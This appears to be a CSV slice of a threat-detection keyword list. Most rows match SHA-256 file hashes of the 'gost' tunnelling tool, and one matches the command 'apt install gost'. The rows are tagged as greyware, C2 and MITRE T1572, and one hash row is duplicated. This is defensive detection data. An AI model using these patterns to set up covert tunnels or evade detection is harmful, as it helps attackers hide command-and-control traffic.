"*884a510aa8274a74bd77d27e5ae3b55c55a55ccc115ef0985d10a69b359e1453*",".{0,1000}884a510aa8274a74bd77d27e5ae3b55c55a55ccc115ef0985d10a69b359e1453.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*89af64dd653594b71277b175037995b356d139881c766706a4ab1862250a7f61*",".{0,1000}89af64dd653594b71277b175037995b356d139881c766706a4ab1862250a7f61.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*8a1d6e1d9a8494a491c1f2fef92f0243f4d39406fa159b4ecb45428148fcbeb4*",".{0,1000}8a1d6e1d9a8494a491c1f2fef92f0243f4d39406fa159b4ecb45428148fcbeb4.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*8c1fa8087f1f0542b4b982791b6b403e278a3ff6154ed37a20f6c590054edda4*",".{0,1000}8c1fa8087f1f0542b4b982791b6b403e278a3ff6154ed37a20f6c590054edda4.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*8d59755171b977af9ec836990ee55a4d1f17873d7773131267b774b14d121fff*",".{0,1000}8d59755171b977af9ec836990ee55a4d1f17873d7773131267b774b14d121fff.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*8e3a219286ad2715712ada61697d622cf5eb597a05bab126546101cc48e0991b*",".{0,1000}8e3a219286ad2715712ada61697d622cf5eb597a05bab126546101cc48e0991b.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*8eef0831a9aa9bbf01ae154c47595b024470c07be4c80b37b73b47590467bc32*",".{0,1000}8eef0831a9aa9bbf01ae154c47595b024470c07be4c80b37b73b47590467bc32.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*8f1198f114049ac2a556308e557acd1ab0174bf7943b2da160be8f32873f81ea*",".{0,1000}8f1198f114049ac2a556308e557acd1ab0174bf7943b2da160be8f32873f81ea.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*90803cb7a60a71766d20b494eb85e92789c3b0f6212f67595540ab706cb734d6*",".{0,1000}90803cb7a60a71766d20b494eb85e92789c3b0f6212f67595540ab706cb734d6.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*929081341e76319dc5209b58611cc5304b940bed099b2b63589534d1963afab7*",".{0,1000}929081341e76319dc5209b58611cc5304b940bed099b2b63589534d1963afab7.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*92d2460414d1b79ae54466442eae7628bbb343c70948e8c2f9afa4d158a0f3ef*",".{0,1000}92d2460414d1b79ae54466442eae7628bbb343c70948e8c2f9afa4d158a0f3ef.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*956c78246b4873877ac8e1a0ee7eed3ff7f9068826696f40f8a0577c55c8f184*",".{0,1000}956c78246b4873877ac8e1a0ee7eed3ff7f9068826696f40f8a0577c55c8f184.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*96c82ea18a4d63d57c4ae10b16e9761fd7a29f92e0704850783768f561e9b85a*",".{0,1000}96c82ea18a4d63d57c4ae10b16e9761fd7a29f92e0704850783768f561e9b85a.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*96d4cb5937b2b5a38dbe2721ea427ca64ffcd745ecaace820fb4daa1c322f696*",".{0,1000}96d4cb5937b2b5a38dbe2721ea427ca64ffcd745ecaace820fb4daa1c322f696.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*96e1cc96595bc8486dfef57f78f680c49e7b19d12649d43fc6501d7a599b4657*",".{0,1000}96e1cc96595bc8486dfef57f78f680c49e7b19d12649d43fc6501d7a599b4657.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*96f6e9c220b74cce941797d7019d76343c94e257c21b3e92869c0d124d49eab8*",".{0,1000}96f6e9c220b74cce941797d7019d76343c94e257c21b3e92869c0d124d49eab8.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*9722e8ce213b1c7571ef7c1df9f5777be11289e3bcf9911e0af45a622b5d50c1*",".{0,1000}9722e8ce213b1c7571ef7c1df9f5777be11289e3bcf9911e0af45a622b5d50c1.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*98b39f9470d2ed0cbf458c04e94dc5762c8b72cf4fb51ba2bf641fdc4462668e*",".{0,1000}98b39f9470d2ed0cbf458c04e94dc5762c8b72cf4fb51ba2bf641fdc4462668e.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*9a22c27e8df3ce1c62a160488a7cddba8c14696c0e0eb406c0c85eab8c243a06*",".{0,1000}9a22c27e8df3ce1c62a160488a7cddba8c14696c0e0eb406c0c85eab8c243a06.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*9a52905fb9c6ed8f3c34111f905d0da5f54dbe6868f10023d5551dd2897e22c4*",".{0,1000}9a52905fb9c6ed8f3c34111f905d0da5f54dbe6868f10023d5551dd2897e22c4.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*9cd1f8564ff1c66d969b01e117e922063213eeaaae20fd5c725cdbf7041e4831*",".{0,1000}9cd1f8564ff1c66d969b01e117e922063213eeaaae20fd5c725cdbf7041e4831.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*9eca862c8cb8490e6b853171d95c9db07d3f306b3018b0ee5e567d3346d8b2d5*",".{0,1000}9eca862c8cb8490e6b853171d95c9db07d3f306b3018b0ee5e567d3346d8b2d5.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*a10f6df2968d892ca277eeddb104dce0bda26aaf47b6a29fa37f6ef7b9b4b330*",".{0,1000}a10f6df2968d892ca277eeddb104dce0bda26aaf47b6a29fa37f6ef7b9b4b330.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*a37e18adcfa7a9faa14430814c622ad6a321cfa65d53d8ca54fed7a55f7c2806*",".{0,1000}a37e18adcfa7a9faa14430814c622ad6a321cfa65d53d8ca54fed7a55f7c2806.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*a49b64c34c17e2f94a789517960f3438cab8b92f8e21560320be9ef68065c9fa*",".{0,1000}a49b64c34c17e2f94a789517960f3438cab8b92f8e21560320be9ef68065c9fa.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*a51ca6422305b85196bb505e9f7e3ba390af7cd442254b10753dc2c101ff5165*",".{0,1000}a51ca6422305b85196bb505e9f7e3ba390af7cd442254b10753dc2c101ff5165.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*a578c81ce8548ef3f5f92a572c15aba6369fe262f19e0bfd74b694b3609380f9*",".{0,1000}a578c81ce8548ef3f5f92a572c15aba6369fe262f19e0bfd74b694b3609380f9.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*a5c16b96d4df537cdc307206b955f7808b58fc2fb425a327bcd6e0bccf95c1ba*",".{0,1000}a5c16b96d4df537cdc307206b955f7808b58fc2fb425a327bcd6e0bccf95c1ba.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*a7a2808a64b5ee630b2ce13597623de03ca5d7a27870aa72f3e0f8156f20d10c*",".{0,1000}a7a2808a64b5ee630b2ce13597623de03ca5d7a27870aa72f3e0f8156f20d10c.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*a91962e86f2b0b0a3a75a097ad056c5595dce4a66a204d15507d03da6eec699c*",".{0,1000}a91962e86f2b0b0a3a75a097ad056c5595dce4a66a204d15507d03da6eec699c.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*a94fff0ac12fea9c27ea48726b7cfa94067884e0c0dff6b1f7abb2ecccee0220*",".{0,1000}a94fff0ac12fea9c27ea48726b7cfa94067884e0c0dff6b1f7abb2ecccee0220.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*a95fbce75c24a2262a98fe462872b23207c9c445ac08ea729236d29231ae3562*",".{0,1000}a95fbce75c24a2262a98fe462872b23207c9c445ac08ea729236d29231ae3562.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*a9cc4cc132566b4d7ccf7def13d41d8968697033ca728d29f3eaa09074ade08b*",".{0,1000}a9cc4cc132566b4d7ccf7def13d41d8968697033ca728d29f3eaa09074ade08b.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*ab6763f2c25e691d68d58da97e7dbedc989cff797e69896e20308bbf65531f90*",".{0,1000}ab6763f2c25e691d68d58da97e7dbedc989cff797e69896e20308bbf65531f90.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*ab83898f2137946267913dba2f4f3e0cb43bb418831b58e6e8ecf1d3a8dcc58d*",".{0,1000}ab83898f2137946267913dba2f4f3e0cb43bb418831b58e6e8ecf1d3a8dcc58d.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*add4bb5104c6fdbb035dd4440efffc28c5b01fa7d333eb42c541f485dee87695*",".{0,1000}add4bb5104c6fdbb035dd4440efffc28c5b01fa7d333eb42c541f485dee87695.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*ae47b091425623f74f010f4ab937cc14b08dc1c815f07626baa20fc03d424a11*",".{0,1000}ae47b091425623f74f010f4ab937cc14b08dc1c815f07626baa20fc03d424a11.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*af8851ad2bacdea811ccb1525e7cc6bc73e082034b7c04f6ac5708708ab9f493*",".{0,1000}af8851ad2bacdea811ccb1525e7cc6bc73e082034b7c04f6ac5708708ab9f493.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*apt install gost*",".{0,1000}apt\sinstall\sgost.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","N/A","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*b19a810320e3d27743080c6732d3ee8caae0c8b747df6001b81b0a1fb226665b*",".{0,1000}b19a810320e3d27743080c6732d3ee8caae0c8b747df6001b81b0a1fb226665b.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*b19a810320e3d27743080c6732d3ee8caae0c8b747df6001b81b0a1fb226665b*",".{0,1000}b19a810320e3d27743080c6732d3ee8caae0c8b747df6001b81b0a1fb226665b.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*b246e5bb88a8e76fe372909c4c3fdaa09d69929ec4d0fd8e373936270a7baa0c*",".{0,1000}b246e5bb88a8e76fe372909c4c3fdaa09d69929ec4d0fd8e373936270a7baa0c.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*b4c80f3e5fcdf37a0d165af88b219bb2e3ce6b435164e6048b5f1b618b908fea*",".{0,1000}b4c80f3e5fcdf37a0d165af88b219bb2e3ce6b435164e6048b5f1b618b908fea.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*b6dd2b211d156dc7295cb5ff0e65eca60ba2d1a86b321ad9bcc4fd37f7ab423f*",".{0,1000}b6dd2b211d156dc7295cb5ff0e65eca60ba2d1a86b321ad9bcc4fd37f7ab423f.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*b6f5c4dc870fdc69d0309c5d5a2a5d48a924a5c14a62b8a13228f071749739b5*",".{0,1000}b6f5c4dc870fdc69d0309c5d5a2a5d48a924a5c14a62b8a13228f071749739b5.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*b74f47cf6fd216692dc71832ec8910ddd60b64b08b0aa6593ee83e7c08416f73*",".{0,1000}b74f47cf6fd216692dc71832ec8910ddd60b64b08b0aa6593ee83e7c08416f73.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*b7e45744a48f5a5db2177b70a0c6741909343d2393045204ebf6c740c50e1de1*",".{0,1000}b7e45744a48f5a5db2177b70a0c6741909343d2393045204ebf6c740c50e1de1.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*b80fcbbc7283e4737d325cd9566c3269ee97cde42c1377721abab7c45d9e518e*",".{0,1000}b80fcbbc7283e4737d325cd9566c3269ee97cde42c1377721abab7c45d9e518e.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*b92dd2f3e8834af0a175dcf8ec3463b7b1012a8f23769fcbe96e4062505bf3b8*",".{0,1000}b92dd2f3e8834af0a175dcf8ec3463b7b1012a8f23769fcbe96e4062505bf3b8.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*bb5f93973ab84243afce3f94f61b49887f275bc88db4e1fd892ab11a9eff7584*",".{0,1000}bb5f93973ab84243afce3f94f61b49887f275bc88db4e1fd892ab11a9eff7584.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*bbab0b5d719860c14954099bbe5f641c3594ffb1ad8d7c91c7895c5bea221964*",".{0,1000}bbab0b5d719860c14954099bbe5f641c3594ffb1ad8d7c91c7895c5bea221964.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*be547f029cf462e5654c5d30c3833bdf54cfab966e6287a2f03dfb6c4a16da33*",".{0,1000}be547f029cf462e5654c5d30c3833bdf54cfab966e6287a2f03dfb6c4a16da33.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*c11dc344bc262b1034a8cc98fe5f1032b4bc4a6cea372399884746e7fd278944*",".{0,1000}c11dc344bc262b1034a8cc98fe5f1032b4bc4a6cea372399884746e7fd278944.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*c32e4b8d04c97c4ea36989159350bb6b90ec7b7f6328da448be3c94c81e57bfd*",".{0,1000}c32e4b8d04c97c4ea36989159350bb6b90ec7b7f6328da448be3c94c81e57bfd.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*c3d703c8e406f542bb9688a3e31c8164c8a34ff99785e256b2f7da8ae73a85cf*",".{0,1000}c3d703c8e406f542bb9688a3e31c8164c8a34ff99785e256b2f7da8ae73a85cf.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*c3f953d4dd3ae26e5206c1194b1baf5e2d8b8a06778866eb62dbd493db500dc6*",".{0,1000}c3f953d4dd3ae26e5206c1194b1baf5e2d8b8a06778866eb62dbd493db500dc6.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*c4cf6a2d28fb9c4fce9337cb06adc5fa69601eec6b2e8d10bc9cd3a211f06e85*",".{0,1000}c4cf6a2d28fb9c4fce9337cb06adc5fa69601eec6b2e8d10bc9cd3a211f06e85.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*c6599963f89162253d6501a99425525a3406309a757f3515d957d5ff2452dffd*",".{0,1000}c6599963f89162253d6501a99425525a3406309a757f3515d957d5ff2452dffd.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*c685a8322f7e7b2d25860ccdf8432d20f2077fd2f7480fff39f9b7bd4a1da5ba*",".{0,1000}c685a8322f7e7b2d25860ccdf8432d20f2077fd2f7480fff39f9b7bd4a1da5ba.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*c764892be19cdf290c49fc9d421dc1f4f8359a1c1d127c12c3a3f56f7fe199c2*",".{0,1000}c764892be19cdf290c49fc9d421dc1f4f8359a1c1d127c12c3a3f56f7fe199c2.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*c7f1a98884e039f619255fc3f5ae2bdd90f6bbe46f00f7a60d72a40e82e4858c*",".{0,1000}c7f1a98884e039f619255fc3f5ae2bdd90f6bbe46f00f7a60d72a40e82e4858c.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*ca9c8dba1b481536626a833232ca6146eb1128f8a4f4c6cb480bb37e771898ea*",".{0,1000}ca9c8dba1b481536626a833232ca6146eb1128f8a4f4c6cb480bb37e771898ea.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*cd84694d8b390661c5295f76a523381daaf840c0b3ef16cf02b11086ad8d4028*",".{0,1000}cd84694d8b390661c5295f76a523381daaf840c0b3ef16cf02b11086ad8d4028.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*cde2bf2225a77d8e5ffded509dbcd87d7445101a67acaf5a533e5884e6240beb*",".{0,1000}cde2bf2225a77d8e5ffded509dbcd87d7445101a67acaf5a533e5884e6240beb.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
